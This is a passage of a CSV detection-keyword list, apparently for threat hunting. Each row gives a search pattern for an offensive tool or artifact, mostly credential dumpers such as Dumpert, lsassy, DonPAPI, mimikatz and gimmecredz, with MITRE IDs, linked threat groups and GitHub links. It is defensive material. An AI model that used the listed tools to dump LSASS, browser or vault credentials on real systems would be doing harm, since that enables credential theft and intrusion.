data*",".{0,1000}Dump\sAD\sCertificate\sServices\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","41617" "*Dump AD Integrated DNS data*",".{0,1000}Dump\sAD\sIntegrated\sDNS\sdata.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","41618" "*Dump cookies from Chrome or Edge*",".{0,1000}Dump\scookies\sfrom\sChrome\sor\sEdge.{0,1000}","offensive_tool_keyword","ChromeKatz","Dump cookies directly from Chrome process 
memory","T1555.003 - T1003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Meckazin/ChromeKatz","1","0","#content","N/A","10","10","1171","115","2024-11-26T12:53:22Z","2023-12-07T22:27:06Z","41619" "*Dump Credential Manager for all logged in users*",".{0,1000}Dump\sCredential\sManager\sfor\sall\slogged\sin\susers.{0,1000}","offensive_tool_keyword","pysecdump","Python-based tool to dump security information from Windows systems","T1003.001 - T1081 - T1012 - T1005 - T1518.001","TA0006 - TA0007 - TA0043","N/A","Dispossessor","Credential Access","https://github.com/pentestmonkey/pysecdump","1","0","#content","N/A","10","3","270","49","2020-06-22T04:16:16Z","2013-01-19T18:02:26Z","41620" "*Dump Kerberos tickets to file*",".{0,1000}Dump\sKerberos\stickets\sto\sfile.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#content","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","41621" "*Dump looted SCCM secrets to specified directory*",".{0,1000}Dump\slooted\sSCCM\ssecrets\sto\sspecified\sdirectory.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41622" "*Dump lsass.exe using MiniDumpWriteDump*",".{0,1000}Dump\slsass\.exe\susing\sMiniDumpWriteDump.{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","41623" "*Dump SCCM secrets from WMI 
requests results*",".{0,1000}Dump\sSCCM\ssecrets\sfrom\sWMI\srequests\sresults.{0,1000}","offensive_tool_keyword","dploot","DPAPI looting remotely in Python","T1003.006 - T1027 - T1110.004","TA0006 - TA0007 - TA0010","N/A","N/A","Credential Access","https://github.com/zblurx/dploot","1","0","N/A","N/A","10","5","455","58","2025-04-09T08:17:14Z","2022-05-24T11:05:21Z","41624" "*dump_chrome_user*",".{0,1000}dump_chrome_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41625" "*dump_CREDENTIAL_MSOFFICE*",".{0,1000}dump_CREDENTIAL_MSOFFICE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41626" "*dump_CREDENTIAL_TASKSCHEDULER(*",".{0,1000}dump_CREDENTIAL_TASKSCHEDULER\(.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41627" "*dump_CREDENTIAL_TASKSCHEDULER*",".{0,1000}dump_CREDENTIAL_TASKSCHEDULER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41628" 
"*dump_CREDENTIAL_TSE*",".{0,1000}dump_CREDENTIAL_TSE.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41629" "*dump_domain*",".{0,1000}dump_domain.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","N/A","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","41630" "*dump_exported_functions(library,dll_orig)*",".{0,1000}dump_exported_functions\(library,dll_orig\).{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","41631" "*dump_firefox_user*",".{0,1000}dump_firefox_user.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41632" "*dump_google_password()*",".{0,1000}dump_google_password\(\).{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","41633" "*dump_jenkins*",".{0,1000}dump_jenkins.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41634" "*dump_keepassx*",".{0,1000}dump_keepassx.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. 
and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41635" "*dump_lsass(*",".{0,1000}dump_lsass\(.{0,1000}","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/login-securite/lsassy","1","0","N/A","N/A","10","10","2105","251","2024-12-31T11:56:19Z","2019-12-03T14:03:41Z","41636" "*dump_lsass*",".{0,1000}dump_lsass.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","41637" "*dump_lsass.js*",".{0,1000}dump_lsass\.js.{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41638" "*dump_owamailbox(*",".{0,1000}dump_owamailbox\(.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003 - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","#content","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","41639" 
"*dump_process(*lsass.exe*)*",".{0,1000}dump_process\(.{0,1000}lsass\.exe.{0,1000}\).{0,1000}","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","N/A","10","10","472","72","2024-01-24T20:30:39Z","2021-01-26T22:56:50Z","41640" "*dump_sam(*",".{0,1000}dump_sam\(.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","N/A","10","10","392","48","2024-10-20T10:44:20Z","2022-10-08T19:02:58Z","41641" "*dump_secrets.py*",".{0,1000}dump_secrets\.py.{0,1000}","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1078 - T1135 - T1046 - T1087 - T1105","TA0007 - TA0008 - TA0001 - TA0011","N/A","N/A","Exploitation tool","https://github.com/guardicore/monkey","1","1","N/A","N/A","N/A","10","6779","798","2025-02-28T15:41:56Z","2015-08-30T07:22:51Z","41642" "*dump_ssh_keys*",".{0,1000}dump_ssh_keys.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41643" "*dump_tomcat*",".{0,1000}dump_tomcat.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. 
wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41644" "*dump_VAULT_INTERNET_EXPLORER*",".{0,1000}dump_VAULT_INTERNET_EXPLORER.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41645" "*dump_VAULT_NGC_LOCAL_ACCOOUNT*",".{0,1000}dump_VAULT_NGC_LOCAL_ACCOOUNT.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41646" "*dump_VAULT_WIN_BIO_KEY*",".{0,1000}dump_VAULT_WIN_BIO_KEY.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","N/A","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","41647" "*dump_webconf*",".{0,1000}dump_webconf.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41648" "*dump_webpass*",".{0,1000}dump_webpass.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. 
wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41649" "*dump_wifi_wpa_*",".{0,1000}dump_wifi_wpa_.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","41650" "*dump_WPA-PBKDF2-PMKID_EAPOL.hashcat*",".{0,1000}dump_WPA\-PBKDF2\-PMKID_EAPOL\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41651" "*dump_WPA-PMKID-PBKDF2.hashcat*",".{0,1000}dump_WPA\-PMKID\-PBKDF2\.hashcat.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","41652" "*DumpAADSyncCreds.csproj*",".{0,1000}DumpAADSyncCreds\.csproj.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - 
T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41653" "*DumpAADSyncCreds.exe*",".{0,1000}DumpAADSyncCreds\.exe.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41654" "*DumpAADSyncCreds.sln*",".{0,1000}DumpAADSyncCreds\.sln.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","N/A","10","1","39","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z","41655" "*--dump-bitlocker*--ntds-file *",".{0,1000}\-\-dump\-bitlocker.{0,1000}\-\-ntds\-file\s.{0,1000}","offensive_tool_keyword","quarkspwdump","Dump various types of Windows credentials without injecting in any process","T1003 - T1555","TA0006","N/A","N/A","Credential Access","https://github.com/quarkslab/quarkspwdump","1","0","N/A","N/A","10","5","427","142","2023-01-13T03:45:25Z","2013-02-13T15:16:30Z","41656" "*DumpBrowserHistory*",".{0,1000}DumpBrowserHistory.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","41657" "*DumpChromePasswords.ps1*",".{0,1000}DumpChromePasswords\.ps1.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","41659" "*DumpCreds*",".{0,1000}DumpCreds.{0,1000}","offensive_tool_keyword","DumpCreds","Dumpcreds is a tool that may be used to extract various credentials from running processes. 
I just take a look at mimipenguin(https://github.com/huntergregal/mimipenguin) and tried to improve it a bit","T1055 - T1003 - T1216 - T1002 - T1552","TA0002 - TA0003 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/ponypot/dumpcreds","1","1","N/A","N/A","N/A","1","6","1","2019-10-08T07:26:31Z","2017-10-10T12:57:42Z","41660" "*-DumpCreds*",".{0,1000}\-DumpCreds.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","41661" "*dumpcreds*mimipenguin*",".{0,1000}dumpcreds.{0,1000}mimipenguin.{0,1000}","offensive_tool_keyword","D3m0n1z3dShell","Demonized Shell is an Advanced Tool for persistence in linux","T1098 - T1543.003 - T1547 - T1053.005 - T1546.004 - T1548.003 - T1014 - T1055.001 - T1105 - T1574.006 - T1003 - T1057 - T1055 - T1027 - T1497.001 - T1037.004 - T1037","TA0003 - TA0004 - TA0005 - 
TA0006 - TA0007 - TA0011","N/A","N/A","Persistence","https://github.com/MatheuZSecurity/D3m0n1z3dShell","1","0","#linux","N/A","10","4","373","54","2025-01-05T13:56:51Z","2023-05-30T02:30:47Z","41662" "*dumpCredStore.ps1*",".{0,1000}dumpCredStore\.ps1.{0,1000}","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1060","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK 
SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41663" "*Dumped LSASS memory to *",".{0,1000}Dumped\sLSASS\smemory\sto\s.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","41665" "*Dumpert by Outflank*",".{0,1000}Dumpert\sby\sOutflank.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. 
while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","0","#content","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41666" "*Dumpert.bin*",".{0,1000}Dumpert\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41667" "*dumpert.dmp*",".{0,1000}dumpert\.dmp.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike. while not touching disk and evading AV/EDR monitored user-mode API calls.","T1055.011 - T1003 - T1562.001 - T1027","TA0005 - TA0006","N/A","Dispossessor","Credential Access","https://github.com/outflanknl/Dumpert","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41668" "*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - 
BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","N/A","10","10","1523","246","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z","41669" "*Dumpert.exe*",".{0,1000}Dumpert\.exe.{0,1000}","offensive_tool_keyword","Dumpert","Dumpert. an LSASS memory dumper using direct system calls and API unhooking Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. This tool demonstrates the use of direct System Calls and API unhooking and 